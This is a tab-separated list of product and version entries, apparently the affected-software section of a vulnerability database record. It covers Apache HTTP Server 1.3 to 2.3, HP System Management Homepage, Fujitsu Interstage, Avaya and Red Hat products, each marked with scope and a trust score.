vendor:	apache	model:	apache	scope:	eq	version:	2.0.50	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.49	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.48	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.47	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.46	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.45	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.44	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.43	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.42	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.41	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.40	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.39	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.38	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.37	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.36	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.35	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.32	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.28	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.21	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.20	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.19	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.18	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.17	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.16	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.64	Trust: 0.3
vendor:	sophos	model:	web appliance	scope:	ne	version:	3.8.1.1	Trust: 0.3
vendor:	sophos	model:	web appliance	scope:	ne	version:	3.7.9.1	Trust: 0.3
vendor:	juniper	model:	nsm appliance generic offline for centos	scope:	ne	version:	51	Trust: 0.3
vendor:	juniper	model:	junos space 13.1r1.6	scope:	ne	version:	-	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	ne	version:	v70001.40	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	ne	version:	v70001.3.23	Trust: 0.3
vendor:	hp	model:	xp provisioning manager	scope:	ne	version:	7.0.0-00	Trust: 0.3
vendor:	hp	model:	xp p9000 command view advanced edition	scope:	ne	version:	7.4.1-00	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	ne	version:	7.1.1	Trust: 0.3
vendor:	hp	model:	p9000 tiered storage manager	scope:	ne	version:	7.4.1-00	Trust: 0.3
vendor:	hp	model:	p9000 replication manager	scope:	ne	version:	7.4.1-00	Trust: 0.3
vendor:	hp	model:	onboard administrator	scope:	ne	version:	3.56	Trust: 0.3
vendor:	apple	model:	mac os	scope:	ne	version:	x10.8.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	ne	version:	x10.7.5	Trust: 0.3
vendor:	apache	model:	2.2.22-dev	scope:	ne	version:	-	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	2.0.65	Trust: 0.3
vendor:	redhat	model:	enterprise linux ws	scope:	eq	version:	4	Trust: 0.3
vendor:	redhat	model:	enterprise linux es	scope:	eq	version:	4	Trust: 0.3
vendor:	redhat	model:	enterprise linux desktop version	scope:	eq	version:	4	Trust: 0.3
vendor:	red	model:	hat jboss enterprise web server for rhel	scope:	eq	version:	61.0	Trust: 0.3
vendor:	red	model:	hat jboss enterprise web server for rhel server	scope:	eq	version:	51.0	Trust: 0.3
vendor:	red	model:	hat enterprise linux workstation	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux server	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux hpc node optional	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux hpc node	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux desktop optional	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux desktop	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux desktop client	scope:	eq	version:	5	Trust: 0.3
vendor:	red	model:	hat enterprise linux as	scope:	eq	version:	4	Trust: 0.3
vendor:	red	model:	hat enterprise linux server	scope:	eq	version:	5	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	4	Trust: 0.3
vendor:	oracle	model:	application server 10g r3	scope:	eq	version:	10.1.3.5.0	Trust: 0.3
vendor:	mandriva	model:	linux mandrake x86 64	scope:	eq	version:	2009.0	Trust: 0.3
vendor:	mandriva	model:	linux mandrake	scope:	eq	version:	2009.0	Trust: 0.3
vendor:	ibm	model:	os/400 v6r1m0	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	os/400 v5r5m0	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	os/400 v5r4m0	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.11	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.0.5	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.0.19	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.0.17	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.0.15	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.0.13	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.2.27	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.0.96	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.2.77	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.1.73	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.68	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.64	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.2.0-12	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.1.0.103	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.1.0.102	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.1.0-103	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.0.0.95	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.0.0-95	Trust: 0.3
vendor:	hp	model:	system management homepage b	scope:	eq	version:	3.0.2.77	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.2-77	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.1-73	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.0-68	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	0	Trust: 0.3
vendor:	hp	model:	openvms secure web server	scope:	eq	version:	2.2	Trust: 0.3
vendor:	fujitsu	model:	interstage apworks modelers-j edition l10	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage apworks modelers-j edition l10a	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage apworks modelers-j edition l10	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l20a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l20	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l11	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l10b	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l10a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l10	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	9.2	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	9.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition b	scope:	eq	version:	9.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	9.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition b	scope:	eq	version:	9.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition a	scope:	eq	version:	9.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	9.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	8.0.3	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	8.0.2	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	8.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	8.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition 9.1.0b	scope:	-	version:	-	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l20a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l20	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l11	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l10b	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l10a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l10	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer	scope:	eq	version:	5.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer l10	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer l10	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer l20	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	7.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	6.0.2	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	6.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	5.1.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	5.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l11	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l10	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l11	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l10c	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l10b	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l10a	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l10	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	5.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	9.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition b	scope:	eq	version:	9.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	9.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition b	scope:	eq	version:	9.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	8.0.3	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	8.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	6.0.2	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	6.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	5.1.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	5.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition 9.1.0b	scope:	-	version:	-	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition 9.1.0a	scope:	-	version:	-	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l11	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition 6.0a	scope:	-	version:	-	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10c	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10b	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	5.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l20a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l20	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l11	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10b	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10	scope:	eq	version:	5.0	Trust: 0.3
vendor:	avaya	model:	voice portal sp2	scope:	eq	version:	4.1	Trust: 0.3
vendor:	avaya	model:	voice portal sp1	scope:	eq	version:	4.1	Trust: 0.3
vendor:	avaya	model:	voice portal	scope:	eq	version:	4.1	Trust: 0.3
vendor:	avaya	model:	voice portal	scope:	eq	version:	4.0	Trust: 0.3
vendor:	avaya	model:	message networking	scope:	eq	version:	5.2.1	Trust: 0.3
vendor:	avaya	model:	message networking	scope:	eq	version:	5.2.2	Trust: 0.3
vendor:	avaya	model:	message networking sp1	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	message networking	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	message networking	scope:	eq	version:	3.1	Trust: 0.3
vendor:	avaya	model:	meeting exchange	scope:	eq	version:	5.0.0.52	Trust: 0.3
vendor:	avaya	model:	meeting exchange sp2	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	meeting exchange sp1	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	meeting exchange	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	meeting exchange sp1	scope:	eq	version:	5.1	Trust: 0.3
vendor:	avaya	model:	meeting exchange	scope:	eq	version:	5.1	Trust: 0.3
vendor:	avaya	model:	meeting exchange sp2	scope:	eq	version:	5.0	Trust: 0.3
vendor:	avaya	model:	meeting exchange sp1	scope:	eq	version:	5.0	Trust: 0.3
vendor:	avaya	model:	meeting exchange	scope:	eq	version:	5.0	Trust: 0.3
vendor:	avaya	model:	aura system manager	scope:	eq	version:	6.1.3	Trust: 0.3
vendor:	avaya	model:	aura system manager	scope:	eq	version:	6.1.2	Trust: 0.3
vendor:	avaya	model:	aura system manager	scope:	eq	version:	6.1.1	Trust: 0.3
vendor:	avaya	model:	aura system manager sp2	scope:	eq	version:	6.1	Trust: 0.3
vendor:	avaya	model:	aura system manager sp1	scope:	eq	version:	6.1	Trust: 0.3
vendor:	avaya	model:	aura system manager	scope:	eq	version:	6.1	Trust: 0.3
vendor:	avaya	model:	aura system manager sp1	scope:	eq	version:	6.0	Trust: 0.3
vendor:	avaya	model:	aura system manager	scope:	eq	version:	6.0	Trust: 0.3
vendor:	avaya	model:	aura sip enablement services	scope:	eq	version:	5.2.1	Trust: 0.3
vendor:	avaya	model:	aura sip enablement services	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	aura sip enablement services	scope:	eq	version:	5.1	Trust: 0.3
vendor:	avaya	model:	aura sip enablement services	scope:	eq	version:	5.0	Trust: 0.3
vendor:	avaya	model:	aura sip enablement services	scope:	eq	version:	4.0	Trust: 0.3
vendor:	avaya	model:	aura communication manager	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	aura communication manager	scope:	eq	version:	5.1	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.2.3	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.2.2	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.2.1	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.0.1	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.1.6	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.1.5	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.1.4	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.1.3	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.2	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.1	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.0	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.1	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.0	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.6	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.5	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.4	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.2	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.1	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.15	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.14	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.13	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.12	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.11	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.10	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.9	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.8	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.6	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.5	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.4	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.3	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.2	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.9	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.8	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.7	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.6	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.5	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.4	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.3	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.2	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.1	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.63	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.61	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.60	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.59	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.58	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.57	Trust: 0.3
vendor:	apache	model:	software foundation apache -dev	scope:	eq	version:	2.0.56	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.56	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.55	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.54	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.53	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.52	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.51	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.50	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.49	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.48	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.47	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.46	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.45	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.44	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.43	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.42	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.41	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.40	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.39	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.38	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.37	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.36	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.35	Trust: 0.3
vendor:	apache	model:	software foundation apache -beta	scope:	eq	version:	2.0.34	Trust: 0.3
vendor:	apache	model:	software foundation apache -beta	scope:	eq	version:	2.0.32	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.32	Trust: 0.3
vendor:	apache	model:	software foundation apache -beta	scope:	eq	version:	2.0.28	Trust: 0.3
vendor:	apache	model:	software foundation apache beta	scope:	eq	version:	2.0.28	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.28	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.9	Trust: 0.3
vendor:	apache	model:	software foundation apache a9	scope:	eq	version:	2.0	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.68	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.65	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.42	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.41	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.39	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.38	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.37	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.36	Trust: 0.3
vendor:	apache	model:	software foundation apache -dev	scope:	eq	version:	1.3.35	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.34	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.33	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.32	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.31	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.30	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.29	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.28	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.27	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.26	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.25	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.24	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.23	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.22	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.20	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.19	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.18	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.17	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.16	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.15	Trust: 0.3
vendor:	apache	model:	software foundation apache mac	scope:	eq	version:	1.3.14	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.14	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.13	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.12	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.11	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.10	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.9	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.8	Trust: 0.3
vendor:	apache	model:	software foundation apache -dev	scope:	eq	version:	1.3.7	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.7	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.6	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.5	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.4	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.3	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.2	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.1	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.3.38-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.3	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.2.7-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.2.6-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.2.5-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.21	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.20	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.19	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.18	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.17	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.16	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.2.15-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.1	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.0.64-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.0.62-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.0.61-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.0.60-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 1.3.40-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.35	Trust: 0.3
